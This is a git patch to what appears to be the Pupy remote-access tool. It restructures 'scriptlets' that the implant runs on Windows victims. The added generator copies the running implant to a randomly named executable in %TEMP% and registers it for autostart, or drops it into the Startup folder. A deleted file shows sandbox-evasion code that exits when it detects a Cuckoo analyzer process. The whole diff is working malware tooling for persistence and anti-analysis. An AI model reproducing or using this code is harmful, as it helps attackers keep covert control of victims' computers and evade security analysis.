From ce784a9469ba53f092120270950005523012179e Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Wed, 4 May 2016 01:05:18 +0200 Subject: [PATCH] improved persistence scriptlet --- .gitignore | 1 + pupy/scriptlets/detect_cuckoo.py | 18 --------- .../__init__.py | 0 pupy/scriptlets/persistence/generator.py | 39 +++++++++++++++++++ pupy/scriptlets/reg_persistence/generator.py | 23 ----------- 5 files changed, 40 insertions(+), 41 deletions(-) delete mode 100644 pupy/scriptlets/detect_cuckoo.py rename pupy/scriptlets/{reg_persistence => persistence}/__init__.py (100%) create mode 100644 pupy/scriptlets/persistence/generator.py delete mode 100644 pupy/scriptlets/reg_persistence/generator.py diff --git a/.gitignore b/.gitignore index 1709a1e3..4641232b 100644 --- a/.gitignore +++ b/.gitignore @@ -37,6 +37,7 @@ pupy/modules/*.py[cod] pupy/modules/lib/*.py[cod] pupy/modules/lib/**/*.py[cod] pupy/network/**/*.pyc +pupy/scriptlets/**/*.pyc # do not ignore package & templates files !pupy/packages/ diff --git a/pupy/scriptlets/detect_cuckoo.py b/pupy/scriptlets/detect_cuckoo.py deleted file mode 100644 index 7e68579d..00000000 --- a/pupy/scriptlets/detect_cuckoo.py +++ /dev/null @@ -1,18 +0,0 @@ -#!/usr/bin/env python -# -*- coding: UTF8 -*- -# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) -# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms - - -import subprocess -import re -try: - info = subprocess.STARTUPINFO() - info.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP - info.wShowWindow = subprocess.SW_HIDE - res=subprocess.Popen(["wmic.exe", "process" ,"get", "/FORMAT:LIST"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=info) - if re.search("CommandLine\\s*=\\s*C:\\\\Python27\\\\pythonw.exe\\s+C:\\\\[a-zA-Z0-9]+\\\\analyzer.py",res): - exit() -except Exception: - pass - diff --git a/pupy/scriptlets/reg_persistence/__init__.py b/pupy/scriptlets/persistence/__init__.py similarity index 100% rename from pupy/scriptlets/reg_persistence/__init__.py rename to pupy/scriptlets/persistence/__init__.py diff --git a/pupy/scriptlets/persistence/generator.py b/pupy/scriptlets/persistence/generator.py new file mode 100644 index 00000000..3bc19c78 --- /dev/null +++ b/pupy/scriptlets/persistence/generator.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python +# -*- coding: UTF8 -*- +# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) +# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms +import textwrap, random, string +from scriptlets import * + +class ScriptletGenerator(Scriptlet): + """ copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """ + + dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")] + arguments={ + 'method': 'available methods: registry, startup' + } + + def __init__(self, method="registry"): + if not method in ("registry", "startup"): + raise ScriptletArgumentError("unknown persistence method %s"%method) + self.method=method + + def generate(self): + name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe" + if self.method=="registry": + return textwrap.dedent(""" + import sys, shutil, os.path + if sys.platform=="win32": + import pupwinutils.persistence + path=os.path.join(os.path.expandvars("%TEMP%"), {}) + shutil.copy(sys.executable, path) + pupwinutils.persistence.add_registry_startup(path) + """.format(name)) + else: + return textwrap.dedent(""" + import sys, shutil, os.path + if sys.platform=="win32": + shutil.copy(sys.executable, os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{}")) + """.format(name)) + + diff --git a/pupy/scriptlets/reg_persistence/generator.py b/pupy/scriptlets/reg_persistence/generator.py deleted file mode 100644 index abf35c2a..00000000 --- a/pupy/scriptlets/reg_persistence/generator.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python -# -*- coding: UTF8 -*- -# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) -# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms -import textwrap, random -from scriptlets import * - -class ScriptletGenerator(Scriptlet): - """ copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """ - dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")] - def generate(self): - return textwrap.dedent(""" - import sys, shutil, os.path, random, string - if sys.platform=="win32": - import pupwinutils.persistence - random.seed({}) - name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe" - path=os.path.join(os.path.expandvars("%TEMP%"), name) - shutil.copy(sys.executable, path) - pupwinutils.persistence.add_registry_startup(path) - """.format(int(random.getrandbits(32)))) - -